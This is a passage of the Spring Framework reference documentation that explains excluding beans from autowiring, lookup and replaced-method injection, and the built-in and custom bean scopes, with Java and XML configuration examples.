container.\n* Multiple bean definitions within the container may match the type specified by the\n setter method or constructor argument to be autowired. For arrays, collections, or\n Maps, this is not necessarily a problem. However for dependencies that expect a single\n value, this ambiguity is not arbitrarily resolved. If no unique bean definition is\n available, an exception is thrown.\n\nIn the latter scenario, you have several options:\n\n* Abandon autowiring in favor of explicit wiring.\n* Avoid autowiring for a bean definition by setting its `autowire-candidate` attributes\n to `false` as described in the next section.\n* Designate a single bean definition as the __primary__ candidate by setting the\n `primary` attribute of its `<bean\/>` element to `true`.\n* Implement the more fine-grained control available\n with annotation-based configuration, as described in <<beans-annotation-config>>.\n\n\n[[beans-factory-autowire-candidate]]\n==== Excluding a bean from autowiring\n\nOn a per-bean basis, you can exclude a bean from autowiring. In Spring's XML format, set\nthe `autowire-candidate` attribute of the `<bean\/>` element to `false`; the container\nmakes that specific bean definition unavailable to the autowiring infrastructure\n(including annotation style configurations such as <<beans-autowired-annotation,\n`@Autowired`>>).\n\nYou can also limit autowire candidates based on pattern-matching against bean names. The\ntop-level `<beans\/>` element accepts one or more patterns within its\n`default-autowire-candidates` attribute. For example, to limit autowire candidate status\nto any bean whose name ends with __Repository,__ provide a value of *Repository. To\nprovide multiple patterns, define them in a comma-separated list. An explicit value of\n`true` or `false` for a bean definitions `autowire-candidate` attribute always takes\nprecedence, and for such beans, the pattern matching rules do not apply.\n\nThese techniques are useful for beans that you never want to be injected into other\nbeans by autowiring. It does not mean that an excluded bean cannot itself be configured\nusing autowiring. Rather, the bean itself is not a candidate for autowiring other beans.\n\n\n\n\n[[beans-factory-method-injection]]\n=== Method injection\n\nIn most application scenarios, most beans in the container are\n<<beans-factory-scopes-singleton,singletons>>. When a singleton bean needs to\ncollaborate with another singleton bean, or a non-singleton bean needs to collaborate\nwith another non-singleton bean, you typically handle the dependency by defining one\nbean as a property of the other. A problem arises when the bean lifecycles are\ndifferent. Suppose singleton bean A needs to use non-singleton (prototype) bean B,\nperhaps on each method invocation on A. The container only creates the singleton bean A\nonce, and thus only gets one opportunity to set the properties. The container cannot\nprovide bean A with a new instance of bean B every time one is needed.\n\nA solution is to forego some inversion of control. You can <<beans-factory-aware,make\nbean A aware of the container>> by implementing the `ApplicationContextAware` interface,\nand by <<beans-factory-client,making a getBean(\"B\") call to the container>> ask for (a\ntypically new) bean B instance every time bean A needs it. The following is an example\nof this approach:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ a class that uses a stateful Command-style class to perform some processing\n\tpackage fiona.apple;\n\n\t\/\/ Spring-API imports\n\timport org.springframework.beans.BeansException;\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.ApplicationContextAware;\n\n\tpublic class CommandManager implements ApplicationContextAware {\n\n\t\tprivate ApplicationContext applicationContext;\n\n\t\tpublic Object process(Map commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\tprotected Command createCommand() {\n\t\t\t\/\/ notice the Spring API dependency!\n\t\t\treturn this.applicationContext.getBean(\"command\", Command.class);\n\t\t}\n\n\t\tpublic void setApplicationContext(\n\t\t\t\tApplicationContext applicationContext) throws BeansException {\n\t\t\tthis.applicationContext = applicationContext;\n\t\t}\n\t}\n----\n\nThe preceding is not desirable, because the business code is aware of and coupled to the\nSpring Framework. Method Injection, a somewhat advanced feature of the Spring IoC\ncontainer, allows this use case to be handled in a clean fashion.\n\n****\nYou can read more about the motivation for Method Injection in\nhttps:\/\/spring.io\/blog\/2004\/08\/06\/method-injection\/[this blog entry].\n****\n\n\n[[beans-factory-lookup-method-injection]]\n==== Lookup method injection\n\nLookup method injection is the ability of the container to override methods on\n__container managed beans__, to return the lookup result for another named bean in the\ncontainer. The lookup typically involves a prototype bean as in the scenario described\nin the preceding section. The Spring Framework implements this method injection by using\nbytecode generation from the CGLIB library to generate dynamically a subclass that\noverrides the method.\n\n[NOTE]\n====\n* For this dynamic subclassing to work, the class that the Spring bean container will\n subclass cannot be `final`, and the method to be overridden cannot be `final` either.\n* Unit-testing a class that has an `abstract` method requires you to subclass the class\n yourself and to supply a stub implementation of the `abstract` method.\n* Concrete methods are also necessary for component scanning which requires concrete\n classes to pick up.\n* A further key limitation is that lookup methods won't work with factory methods and\n in particular not with `@Bean` methods in configuration classes, since the container\n is not in charge of creating the instance in that case and therefore cannot create\n a runtime-generated subclass on the fly.\n====\n\nLooking at the `CommandManager` class in the previous code snippet, you see that the\nSpring container will dynamically override the implementation of the `createCommand()`\nmethod. Your `CommandManager` class will not have any Spring dependencies, as can be\nseen in the reworked example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage fiona.apple;\n\n\t\/\/ no more Spring imports!\n\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nIn the client class containing the method to be injected (the `CommandManager` in this\ncase), the method to be injected requires a signature of the following form:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<public|protected> [abstract] <return-type> theMethodName(no-arguments);\n----\n\nIf the method is `abstract`, the dynamically-generated subclass implements the method.\nOtherwise, the dynamically-generated subclass overrides the concrete method defined in\nthe original class. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- a stateful bean deployed as a prototype (non-singleton) -->\n\t<bean id=\"myCommand\" class=\"fiona.apple.AsyncCommand\" scope=\"prototype\">\n\t\t<!-- inject dependencies here as required -->\n\t<\/bean>\n\n\t<!-- commandProcessor uses statefulCommandHelper -->\n\t<bean id=\"commandManager\" class=\"fiona.apple.CommandManager\">\n\t\t<lookup-method name=\"createCommand\" bean=\"myCommand\"\/>\n\t<\/bean>\n----\n\nThe bean identified as __commandManager__ calls its own method `createCommand()`\nwhenever it needs a new instance of the __myCommand__ bean. You must be careful to deploy\nthe `myCommand` bean as a prototype, if that is actually what is needed. If it is\n as a <<beans-factory-scopes-singleton,singleton>>, the same instance of the `myCommand`\nbean is returned each time.\n\nAlternatively, within the annotation-based component model, you may declare a lookup\nmethod through the `@Lookup` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup(\"myCommand\")\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nOr, more idiomatically, you may rely on the target bean getting resolved against the\ndeclared return type of the lookup method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tMyCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup\n\t\tprotected abstract MyCommand createCommand();\n\t}\n----\n\nNote that you will typically declare such annotated lookup methods with a concrete\nstub implementation, in order for them to be compatible with Spring's component\nscanning rules where abstract classes get ignored by default. This limitation does not\napply in case of explicitly registered or explicitly imported bean classes.\n\n[TIP]\n====\nAnother way of accessing differently scoped target beans is an `ObjectFactory`\/\n`Provider` injection point. Check out <<beans-factory-scopes-other-injection>>.\n\nThe interested reader may also find the `ServiceLocatorFactoryBean` (in the\n`org.springframework.beans.factory.config` package) to be of use.\n====\n\n\n[[beans-factory-arbitrary-method-replacement]]\n==== Arbitrary method replacement\n\nA less useful form of method injection than lookup method injection is the ability to\nreplace arbitrary methods in a managed bean with another method implementation. Users\nmay safely skip the rest of this section until the functionality is actually needed.\n\nWith XML-based configuration metadata, you can use the `replaced-method` element to\nreplace an existing method implementation with another, for a deployed bean. Consider\nthe following class, with a method computeValue, which we want to override:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyValueCalculator {\n\n\t\tpublic String computeValue(String input) {\n\t\t\t\/\/ some real code...\n\t\t}\n\n\t\t\/\/ some other methods...\n\n\t}\n----\n\nA class implementing the `org.springframework.beans.factory.support.MethodReplacer`\ninterface provides the new method definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/**\n\t * meant to be used to override the existing computeValue(String)\n\t * implementation in MyValueCalculator\n\t *\/\n\tpublic class ReplacementComputeValue implements MethodReplacer {\n\n\t\tpublic Object reimplement(Object o, Method m, Object[] args) throws Throwable {\n\t\t\t\/\/ get the input value, work with it, and return a computed result\n\t\t\tString input = (String) args[0];\n\t\t\t...\n\t\t\treturn ...;\n\t\t}\n\t}\n----\n\nThe bean definition to deploy the original class and specify the method override would\nlook like this:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myValueCalculator\" class=\"x.y.z.MyValueCalculator\">\n\t\t<!-- arbitrary method replacement -->\n\t\t<replaced-method name=\"computeValue\" replacer=\"replacementComputeValue\">\n\t\t\t<arg-type>String<\/arg-type>\n\t\t<\/replaced-method>\n\t<\/bean>\n\n\t<bean id=\"replacementComputeValue\" class=\"a.b.c.ReplacementComputeValue\"\/>\n----\n\nYou can use one or more contained `<arg-type\/>` elements within the `<replaced-method\/>`\nelement to indicate the method signature of the method being overridden. The signature\nfor the arguments is necessary only if the method is overloaded and multiple variants\nexist within the class. For convenience, the type string for an argument may be a\nsubstring of the fully qualified type name. For example, the following all match\n`java.lang.String`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tjava.lang.String\n\tString\n\tStr\n----\n\nBecause the number of arguments is often enough to distinguish between each possible\nchoice, this shortcut can save a lot of typing, by allowing you to type only the\nshortest string that will match an argument type.\n\n\n\n\n[[beans-factory-scopes]]\n== Bean scopes\nWhen you create a bean definition, you create a __recipe__ for creating actual instances\nof the class defined by that bean definition. The idea that a bean definition is a\nrecipe is important, because it means that, as with a class, you can create many object\ninstances from a single recipe.\n\nYou can control not only the various dependencies and configuration values that are to\nbe plugged into an object that is created from a particular bean definition, but also\nthe __scope__ of the objects created from a particular bean definition. This approach is\npowerful and flexible in that you can __choose__ the scope of the objects you create\nthrough configuration instead of having to bake in the scope of an object at the Java\nclass level. Beans can be defined to be deployed in one of a number of scopes: out of\nthe box, the Spring Framework supports six scopes, five of which are available only if\nyou use a web-aware `ApplicationContext`.\n\nThe following scopes are supported out of the box. You can also create\n<<beans-factory-scopes-custom,a custom scope.>>\n\n[[beans-factory-scopes-tbl]]\n.Bean scopes\n|===\n| Scope| Description\n\n| <<beans-factory-scopes-singleton,singleton>>\n| (Default) Scopes a single bean definition to a single object instance per Spring IoC\n container.\n\n| <<beans-factory-scopes-prototype,prototype>>\n| Scopes a single bean definition to any number of object instances.\n\n| <<beans-factory-scopes-request,request>>\n| Scopes a single bean definition to the lifecycle of a single HTTP request; that is,\n each HTTP request has its own instance of a bean created off the back of a single bean\n definition. Only valid in the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-session,session>>\n| Scopes a single bean definition to the lifecycle of an HTTP `Session`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-application,application>>\n| Scopes a single bean definition to the lifecycle of a `ServletContext`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<websocket-stomp-websocket-scope,websocket>>\n| Scopes a single bean definition to the lifecycle of a `WebSocket`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n|===\n\n[NOTE]\n====\nAs of Spring 3.0, a __thread scope__ is available, but is not registered by default. For\nmore information, see the documentation for\n{api-spring-framework}\/context\/support\/SimpleThreadScope.html[`SimpleThreadScope`].\nFor instructions on how to register this or any other custom scope, see\n<<beans-factory-scopes-custom-using>>.\n====\n\n\n\n[[beans-factory-scopes-singleton]]\n=== The singleton scope\n\nOnly one __shared__ instance of a singleton bean is managed, and all requests for beans\nwith an id or ids matching that bean definition result in that one specific bean\ninstance being returned by the Spring container.\n\nTo put it another way, when you define a bean definition and it is scoped as a\nsingleton, the Spring IoC container creates __exactly one__ instance of the object\ndefined by that bean definition. This single instance is stored in a cache of such\nsingleton beans, and __all subsequent requests and references__ for that named bean\nreturn the cached object.\n\nimage::images\/singleton.png[width=400]\n\nSpring's concept of a singleton bean differs from the Singleton pattern as defined in\nthe Gang of Four (GoF) patterns book. The GoF Singleton hard-codes the scope of an\nobject such that one __and only one__ instance of a particular class is created __per\nClassLoader__. The scope of the Spring singleton is best described as __per container\nand per bean__. This means that if you define one bean for a particular class in a\nsingle Spring container, then the Spring container creates one __and only one__ instance\nof the class defined by that bean definition. __The singleton scope is the default scope\nin Spring__. To define a bean as a singleton in XML, you would write, for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\"\/>\n\n\t<!-- the following is equivalent, though redundant (singleton scope is the default) -->\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"singleton\"\/>\n----\n\n\n\n[[beans-factory-scopes-prototype]]\n=== The prototype scope\n\nThe non-singleton, prototype scope of bean deployment results in the __creation of a new\nbean instance__ every time a request for that specific bean is made. That is, the bean\nis injected into another bean or you request it through a `getBean()` method call on the\ncontainer. As a rule, use the prototype scope for all stateful beans and the singleton\nscope for stateless beans.\n\nThe following diagram illustrates the Spring prototype scope. __A data access object\n(DAO) is not typically configured as a prototype, because a typical DAO does not hold\nany conversational state; it was just easier for this author to reuse the core of the\nsingleton diagram.__\n\nimage::images\/prototype.png[width=400]\n\nThe following example defines a bean as a prototype in XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"prototype\"\/>\n----\n\nIn contrast to the other scopes, Spring does not manage the complete lifecycle of a\nprototype bean: the container instantiates, configures, and otherwise assembles a\nprototype object, and hands it to the client, with no further record of that prototype\ninstance. Thus, although__ initialization__ lifecycle callback methods are called on all\nobjects regardless of scope, in the case of prototypes, configured __destruction__\nlifecycle callbacks are __not__ called. The client code must clean up prototype-scoped\nobjects and release expensive resources that the prototype bean(s) are holding. To get\nthe Spring container to release resources held by prototype-scoped beans, try using a\ncustom <<beans-factory-extension-bpp,bean post-processor>>, which holds a reference to\nbeans that need to be cleaned up.\n\nIn some respects, the Spring container's role in regard to a prototype-scoped bean is a\nreplacement for the Java `new` operator. All lifecycle management past that point must\nbe handled by the client. (For details on the lifecycle of a bean in the Spring\ncontainer, see <<beans-factory-lifecycle>>.)\n\n\n\n[[beans-factory-scopes-sing-prot-interaction]]\n=== Singleton beans with prototype-bean dependencies\n\nWhen you use singleton-scoped beans with dependencies on prototype beans, be aware that\n__dependencies are resolved at instantiation time__. Thus if you dependency-inject a\nprototype-scoped bean into a singleton-scoped bean, a new prototype bean is instantiated\nand then dependency-injected into the singleton bean. The prototype instance is the sole\ninstance that is ever supplied to the singleton-scoped bean.\n\nHowever, suppose you want the singleton-scoped bean to acquire a new instance of the\nprototype-scoped bean repeatedly at runtime. You cannot dependency-inject a\nprototype-scoped bean into your singleton bean, because that injection occurs only\n__once__, when the Spring container is instantiating the singleton bean and resolving\nand injecting its dependencies. If you need a new instance of a prototype bean at\nruntime more than once, see <<beans-factory-method-injection>>\n\n\n\n[[beans-factory-scopes-other]]\n=== Request, session, application, and WebSocket scopes\n\nThe `request`, `session`, `application`, and `websocket` scopes are __only__ available\nif you use a web-aware Spring `ApplicationContext` implementation (such as\n`XmlWebApplicationContext`). If you use these scopes with regular Spring IoC containers\nsuch as the `ClassPathXmlApplicationContext`, an `IllegalStateException` will be thrown\ncomplaining about an unknown bean scope.\n\n\n[[beans-factory-scopes-other-web-configuration]]\n==== Initial web configuration\n\nTo support the scoping of beans at the `request`, `session`, `application`, and\n`websocket` levels (web-scoped beans), some minor initial configuration is\nrequired before you define your beans. (This initial setup is __not__ required\nfor the standard scopes, `singleton` and `prototype`.)\n\nHow you accomplish this initial setup depends on your particular Servlet environment.\n\nIf you access scoped beans within Spring Web MVC, in effect, within a request that is\nprocessed by the Spring `DispatcherServlet`, then no special setup is necessary:\n`DispatcherServlet` already exposes all relevant state.\n\nIf you use a Servlet 2.5 web container, with requests processed outside of Spring's\n`DispatcherServlet` (for example, when using JSF or Struts), you need to register the\n`org.springframework.web.context.request.RequestContextListener` `ServletRequestListener`.\nFor Servlet 3.0+, this can be done programmatically via the `WebApplicationInitializer`\ninterface. Alternatively, or for older containers, add the following declaration to\nyour web application's `web.xml` file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<listener>\n\t\t\t<listener-class>\n\t\t\t\torg.springframework.web.context.request.RequestContextListener\n\t\t\t<\/listener-class>\n\t\t<\/listener>\n\t\t...\n\t<\/web-app>\n----\n\nAlternatively, if there are issues with your listener setup, consider using Spring's\n`RequestContextFilter`. The filter mapping depends on the surrounding web\napplication configuration, so you have to change it as appropriate.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<filter>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.RequestContextFilter<\/filter-class>\n\t\t<\/filter>\n\t\t<filter-mapping>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\t\t...\n\t<\/web-app>\n----\n\n`DispatcherServlet`, `RequestContextListener`, and `RequestContextFilter` all do exactly\nthe same thing, namely bind the HTTP request object to the `Thread` that is servicing\nthat request. This makes beans that are request- and session-scoped available further\ndown the call chain.\n\n\n[[beans-factory-scopes-request]]\n==== Request scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"loginAction\" class=\"com.foo.LoginAction\" scope=\"request\"\/>\n----\n\nThe Spring container creates a new instance of the `LoginAction` bean by using the\n`loginAction` bean definition for each and every HTTP request. That is, the\n`loginAction` bean is scoped at the HTTP request level. You can change the internal\nstate of the instance that is created as much as you want, because other instances\ncreated from the same `loginAction` bean definition will not see these changes in state;\nthey are particular to an individual request. When the request completes processing, the\nbean that is scoped to the request is discarded.\n\nWhen using annotation-driven components or Java Config, the `@RequestScope` annotation\ncan be used to assign a component to the `request` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@RequestScope**\n\t@Component\n\tpublic class LoginAction {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-session]]\n==== Session scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n----\n\nThe Spring container creates a new instance of the `UserPreferences` bean by using the\n`userPreferences` bean definition for the lifetime of a single HTTP `Session`. In other\nwords, the `userPreferences` bean is effectively scoped at the HTTP `Session` level. As\nwith `request-scoped` beans, you can change the internal state of the instance that is\ncreated as much as you want, knowing that other HTTP `Session` instances that are also\nusing instances created from the same `userPreferences` bean definition do not see these\nchanges in state, because they are particular to an individual HTTP `Session`. When the\nHTTP `Session` is eventually discarded, the bean that is scoped to that particular HTTP\n`Session` is also discarded.\n\nWhen using annotation-driven components or Java Config, the `@SessionScope` annotation\ncan be used to assign a component to the `session` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SessionScope**\n\t@Component\n\tpublic class UserPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-application]]\n==== Application scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"appPreferences\" class=\"com.foo.AppPreferences\" scope=\"application\"\/>\n----\n\nThe Spring container creates a new instance of the `AppPreferences` bean by using the\n`appPreferences` bean definition once for the entire web application. That is, the\n`appPreferences` bean is scoped at the `ServletContext` level, stored as a regular\n`ServletContext` attribute. This is somewhat similar to a Spring singleton bean but\ndiffers in two important ways: It is a singleton per `ServletContext`, not per Spring\n'ApplicationContext' (for which there may be several in any given web application),\nand it is actually exposed and therefore visible as a `ServletContext` attribute.\n\nWhen using annotation-driven components or Java Config, the `@ApplicationScope`\nannotation can be used to assign a component to the `application` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ApplicationScope**\n\t@Component\n\tpublic class AppPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-other-injection]]\n==== Scoped beans as dependencies\n\nThe Spring IoC container manages not only the instantiation of your objects (beans),\nbut also the wiring up of collaborators (or dependencies). If you want to inject (for\nexample) an HTTP request scoped bean into another bean of a longer-lived scope, you may\nchoose to inject an AOP proxy in place of the scoped bean. That is, you need to inject\na proxy object that exposes the same public interface as the scoped object but that can\nalso retrieve the real target object from the relevant scope (such as an HTTP request)\nand delegate method calls onto the real object.\n\n[NOTE]\n====\nYou may also use `<aop:scoped-proxy\/>` between beans that are scoped as `singleton`,\nwith the reference then going through an intermediate proxy that is serializable\nand therefore able to re-obtain the target singleton bean on deserialization.\n\nWhen declaring `<aop:scoped-proxy\/>` against a bean of scope `prototype`, every method\ncall on the shared proxy will lead to the creation of a new target instance which the\ncall is then being forwarded to.\n\nAlso, scoped proxies are not the only way to access beans from shorter scopes in a\nlifecycle-safe fashion. You may also simply declare your injection point (i.e. the\nconstructor\/setter argument or autowired field) as `ObjectFactory<MyTargetBean>`,\nallowing for a `getObject()` call to retrieve the current instance on demand every\ntime it is needed - without holding on to the instance or storing it separately.\n\nAs an extended variant, you may declare `ObjectProvider<MyTargetBean>` which delivers\nseveral additional access variants, including `getIfAvailable` and `getIfUnique`.\n\nThe JSR-330 variant of this is called `Provider`, used with a `Provider<MyTargetBean>`\ndeclaration and a corresponding `get()` call for every retrieval attempt.\nSee <<beans-standard-annotations,here>> for more details on JSR-330 overall.\n====\n\nThe configuration in the following example is only one line, but it is important to\nunderstand the \"why\" as well as the \"how\" behind it.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<!-- an HTTP Session-scoped bean exposed as a proxy -->\n\t\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t\t<!-- instructs the container to proxy the surrounding bean -->\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<!-- a singleton-scoped bean injected with a proxy to the above bean -->\n\t\t<bean id=\"userService\" class=\"com.foo.SimpleUserService\">\n\t\t\t<!-- a reference to the proxied userPreferences bean -->\n\t\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nTo create such a proxy, you insert a child `<aop:scoped-proxy\/>` element into a scoped\nbean definition (see <<beans-factory-scopes-other-injection-proxies>> and\n<<xsd-configuration>>). Why do definitions of beans scoped at the `request`, `session`\nand custom-scope levels require the `<aop:scoped-proxy\/>` element? Let's examine the\nfollowing singleton bean definition and contrast it with what you need to define for\nthe aforementioned scopes (note that the following `userPreferences` bean definition\nas it stands is __incomplete__).\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nIn the preceding example, the singleton bean `userManager` is injected with a reference\nto the HTTP `Session`-scoped bean `userPreferences`. The salient point here is that the\n`userManager` bean is a singleton: it will be instantiated __exactly once__ per\ncontainer, and its dependencies (in this case only one, the `userPreferences` bean) are\nalso injected only once. This means that the `userManager` bean will only operate on the\nexact same `userPreferences` object, that is, the one that it was originally injected\nwith.\n\nThis is __not__ the behavior you want when injecting a shorter-lived scoped bean into a\nlonger-lived scoped bean, for example injecting an HTTP `Session`-scoped collaborating\nbean as a dependency into singleton bean. Rather, you need a single `userManager`\nobject, and for the lifetime of an HTTP `Session`, you need a `userPreferences` object\nthat is specific to said HTTP `Session`. Thus the container creates an object that\nexposes the exact same public interface as the `UserPreferences` class (ideally an\nobject that __is a__ `UserPreferences` instance) which can fetch the real\n`UserPreferences` object from the scoping mechanism (HTTP request, `Session`, etc.). The\ncontainer injects this proxy object into the `userManager` bean, which is unaware that\nthis `UserPreferences` reference is a proxy. In this example, when a `UserManager`\ninstance invokes a method on the dependency-injected `UserPreferences` object, it\nactually is invoking a method on the proxy. The proxy then fetches the real\n`UserPreferences` object from (in this case) the HTTP `Session`, and delegates the\nmethod invocation onto the retrieved real `UserPreferences` object.\n\nThus you need the following, correct and complete, configuration when injecting\n`request-` and `session-scoped` beans into collaborating objects:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\n[[beans-factory-scopes-other-injection-proxies]]\n===== Choosing the type of proxy to create\n\nBy default, when the Spring container creates a proxy for a bean that is marked up with\nthe `<aop:scoped-proxy\/>` element, __a CGLIB-based class proxy is created__.\n\n[NOTE]\n====\nCGLIB proxies only intercept public method calls! Do not call non-public methods\non such a proxy; they will not be delegated to the actual scoped target object.\n====\n\nAlternatively, you can configure the Spring container to create standard JDK\ninterface-based proxies for such scoped beans, by specifying `false` for the value of\nthe `proxy-target-class` attribute of the `<aop:scoped-proxy\/>` element. Using JDK\ninterface-based proxies means that you do not need additional libraries in your\napplication classpath to effect such proxying. However, it also means that the class of\nthe scoped bean must implement at least one interface, and __that all__ collaborators\ninto which the scoped bean is injected must reference the bean through one of its\ninterfaces.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- DefaultUserPreferences implements the UserPreferences interface -->\n\t<bean id=\"userPreferences\" class=\"com.foo.DefaultUserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy proxy-target-class=\"false\"\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nFor more detailed information about choosing class-based or interface-based proxying,\nsee <<aop-proxying>>.\n\n\n\n[[beans-factory-scopes-custom]]\n=== Custom scopes\n\nThe bean scoping mechanism is extensible; You can define your own\nscopes, or even redefine existing scopes, although the latter is considered bad practice\nand you __cannot__ override the built-in `singleton` and `prototype` scopes.\n\n\n[[beans-factory-scopes-custom-creating]]\n==== Creating a custom scope\n\nTo integrate your custom scope(s) into the Spring container, you need to implement the\n`org.springframework.beans.factory.config.Scope` interface, which is described in this\nsection. For an idea of how to implement your own scopes, see the `Scope`\nimplementations that are supplied with the Spring Framework itself and the\n{api-spring-framework}\/beans\/factory\/config\/Scope.html[`Scope` javadocs],\nwhich explains the methods you need to implement in more detail.\n\nThe `Scope` interface has four methods to get objects from the scope, remove them from\nthe scope, and allow them to be destroyed.\n\nThe following method returns the object from the underlying scope. The session scope\nimplementation, for example, returns the session-scoped bean (and if it does not exist,\nthe method returns a new instance of the bean, after having bound it to the session for\nfuture reference).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject get(String name, ObjectFactory objectFactory)\n----\n\nThe following method removes the object from the underlying scope. The session scope\nimplementation for example, removes the session-scoped bean from the underlying session.\nThe object should be returned, but you can return null if the object with the specified\nname is not found.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject remove(String name)\n----\n\nThe following method registers the callbacks the scope should execute when it is\ndestroyed or when the specified object in the scope is destroyed. Refer to the javadocs\nor a Spring scope implementation for more information on destruction callbacks.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerDestructionCallback(String name, Runnable destructionCallback)\n----\n\nThe following method obtains the conversation identifier for the underlying scope. This\nidentifier is different for each scope. For a session scoped implementation, this\nidentifier can be the session identifier.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tString getConversationId()\n----\n\n\n[[beans-factory-scopes-custom-using]]\n==== Using a custom scope\n\nAfter you write and test one or more custom `Scope` implementations, you need to make\nthe Spring container aware of your new scope(s). The following method is the central\nmethod to register a new `Scope` with the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerScope(String scopeName, Scope scope);\n----\n\nThis method 